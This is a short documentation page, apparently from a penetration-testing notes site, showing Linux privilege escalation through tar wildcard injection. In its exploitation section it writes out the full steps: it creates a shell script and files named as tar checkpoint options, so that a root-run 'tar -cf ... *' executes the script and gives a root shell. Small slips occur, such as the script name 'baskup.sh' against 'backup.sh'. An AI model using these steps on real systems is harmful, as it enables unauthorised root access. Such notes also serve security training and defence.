> For the complete documentation index, see [llms.txt](https://morgan-bin-bash.gitbook.io/linux-privilege-escalation/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://morgan-bin-bash.gitbook.io/linux-privilege-escalation/tar-wildcard-injection-privesc.md).

# Tar Wildcard Injection PrivEsc

Tar command with wildcard injection may lead to privilege escalation (PrivEsc).

### [Investigation](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/tar-wildcard-injection-privesc/#investigation) <a href="#investigation" id="investigation"></a>

For example, below command can be executed as root.

```sh
sudo -l

(root) NOPASSWD: /opt/backup/baskup.sh
Copied!
```

#### [Check If the File Contains Tar Command with Wildcards](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/tar-wildcard-injection-privesc/#check-if-the-file-contains-tar-command-with-wildcards) <a href="#check-if-the-file-contains-tar-command-with-wildcards" id="check-if-the-file-contains-tar-command-with-wildcards"></a>

We need to check the content in the file.

```sh
cat /opt/backup/backup.sh

# -cf: create an archived file
tar -cf backup.tar *
Copied!
```

The above **tar** command means that it creates an arvhived file from any input file because it passes **wildcard (\*)**.

<br>

### [Exploitation](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/tar-wildcard-injection-privesc/#exploitation) <a href="#exploitation" id="exploitation"></a>

Now create a payload for privilege escalation.

```sh
cd /opt/backup
echo -e '#!/bin/bash\n/bin/bash' > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
Copied!
```

We've created three files.

```sh
ls /opt/backup

shell.sh  '--checkpoint-action=exec=sh shell.sh'  '--checkpoint=1'
Copied!
```

Now execute **"tar"** command as root with wildcard.

```sh
sudo tar -cf example.tar *
Copied!
```

Wait until **"tar"** command will be executed.\
After a while, we should see the current user switch to root.

```sh
whoami
root
```
